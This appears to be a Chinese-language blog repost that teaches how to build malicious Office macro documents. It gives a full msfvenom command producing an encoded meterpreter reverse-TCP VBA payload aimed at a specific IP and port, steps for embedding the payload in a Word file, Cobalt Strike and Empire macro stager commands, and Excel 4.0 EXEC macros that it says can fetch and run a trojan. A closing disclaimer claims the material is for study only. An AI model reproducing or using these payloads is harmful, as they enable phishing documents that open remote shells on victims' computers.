一、前言
文章有点水大佬们别喷
二、msfVENOM生成宏
在linux中msfvenom生成vba文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=101.132.43.162 lport=6666 -f vba -o 123.vba
建一个word或者excel文档,点击视图->宏->查看宏
输入宏名字选择宏的位置为当前文档的名字点击创建宏
将msfvenom生成的vba的payload复制到里面保存点击否
保存为docm或者doc这里我保存doc打开该文件点击启用宏
metasploit监听带你看就是反弹一个shell
三、CobaltStrike生成宏
打开cobaltstrike点击攻击->生成后门->MS->Office->Micro
复制payload到word里面,cobaltstrike反弹shell成功
四、Empire生成宏
启动empire,选择windows/macro
listeners
uselistener http
set Name test
set Host [url=http://xx.xx.xx.xx:6666][color=#03884]http://xx.xx.xx.xx:6666[/color][/url]
set Port 6666
execute
usestager windows/macroset Listener testset OutFile /root/1.txtexecute
五、Excel4.0执行payload
利用excel4.0可以执行恶意代码打开excel插入Excel4.0
利用exec弹计算机
=EXEC("calc.exe")
=ALERT("Hello, World")
=HALT()
可以利用这个下载我们的木马执行
六、后记
该文章仅供学习交流禁止非法传播。
本文始发于微信公众号(疯猫网络):Office宏病毒几种简单生成方式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论